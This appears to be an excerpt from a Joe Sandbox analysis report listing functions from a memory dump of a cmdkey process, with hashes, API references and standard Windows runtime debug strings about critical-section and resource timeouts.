                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                • Opcode ID: 7f5b00f6d97ca7ebac2efdf815d46b50bd7fc409669c4d171a59b4db14fd6a64
                                                                • Instruction ID: 90e5d38432d2f49c0e62f42d309d9bf02dac2805d9c7f3df650ce569b39948b7
                                                                • Opcode Fuzzy Hash: 7f5b00f6d97ca7ebac2efdf815d46b50bd7fc409669c4d171a59b4db14fd6a64
                                                                • Instruction Fuzzy Hash: 0821657AE00259ABDB10EF79EC40AEEBBF8FF44644F580526E905E7250E730D9118BA1
                                                                Function 034FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035402BD
                                                                • RTL: Re-Waiting, xrefs: 0354031E
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035402E7
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                • Opcode ID: 216b567722022526a19952f700bd9cc706112537b5bc28d18392d829fc32dace
                                                                • Instruction ID: fe5776a9914048c41924cc73c42327d5c9b4731192b3ccbcae4b73eeeb909a78
                                                                • Opcode Fuzzy Hash: 216b567722022526a19952f700bd9cc706112537b5bc28d18392d829fc32dace
                                                                • Instruction Fuzzy Hash: 76E1AF746087419FD724CF28D884B2AF7E4BB84718F280A5EF6A58B3E1D774D849CB46
                                                                Function 0350BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 03547B8E
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03547B7F
                                                                • RTL: Re-Waiting, xrefs: 03547BAC
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                • Opcode ID: dd517d965a015907dfd3d50b2be901e09ca83047f632bbc927eeb583e2deff7f
                                                                • Instruction ID: 2187cb15871f76053e11ba910d09ee22404d9a51194beb71a35c627abca7150f
                                                                • Opcode Fuzzy Hash: dd517d965a015907dfd3d50b2be901e09ca83047f632bbc927eeb583e2deff7f
                                                                • Instruction Fuzzy Hash: 7641E3353007029FD724DE25EC80B6AB7E5FF89710F140A1DF996DB2A0EB32E8058B91
                                                                Function 0350B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0354728C
                                                                Strings
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03547294
                                                                • RTL: Resource at %p, xrefs: 035472A3
                                                                • RTL: Re-Waiting, xrefs: 035472C1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                • Opcode ID: bc9da7007a5af71599aafd87b0b5cebd0dd9013f82cf939f199895bca26970fa
                                                                • Instruction ID: dc5c7c8ece0c82a05e5f72137e8e675012a0ca11533cb3fa21a5cc7d27e0ed54
                                                                • Opcode Fuzzy Hash: bc9da7007a5af71599aafd87b0b5cebd0dd9013f82cf939f199895bca26970fa
                                                                • Instruction Fuzzy Hash: D741F235704202ABD724CE65EC81F6AB7B6FB88714F140A19FC65AB2A0DB21F85287D1
                                                                Function 03582300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                • Opcode ID: 627efae1ad926cb879ffd3f5527e5f51a410d936814a655295ead08971e30c7b
                                                                • Instruction ID: 7be27cd34fc263c7746a910a25b87eed0344e9ed6c188bbb2effea99ea2f497e
                                                                • Opcode Fuzzy Hash: 627efae1ad926cb879ffd3f5527e5f51a410d936814a655295ead08971e30c7b
                                                                • Instruction Fuzzy Hash: F6319A76A002199FDB20DF29DC50BEEBBF8FF44610F844956E849F7150EF309A448B60
                                                                Function 03517D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction ID: 1c78df060c7e3d86e27df8505aa658e422d130beca50a2e1aaccc3c5406f77aa
                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                • Instruction Fuzzy Hash: 9E91A471E0021A9AFF34DE6DE8806BFB7F5BF48320F18465AE865E72E0D73499608750
                                                                Function 034D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                • Opcode ID: b47d550b8a047fd45c7225ceff2d22bfec4a01e8aa1665e8c307270cb0a00c68
                                                                • Instruction ID: 8db2d9aff85ab91f3f3560677f1a95ab14fc784bec581095d2772e846b2131fc
                                                                • Opcode Fuzzy Hash: b47d550b8a047fd45c7225ceff2d22bfec4a01e8aa1665e8c307270cb0a00c68
                                                                • Instruction Fuzzy Hash: 97813775D006699FDB21CB54CC44BEEB7B8AF09710F0445EAA919BB290E7309E85CFA4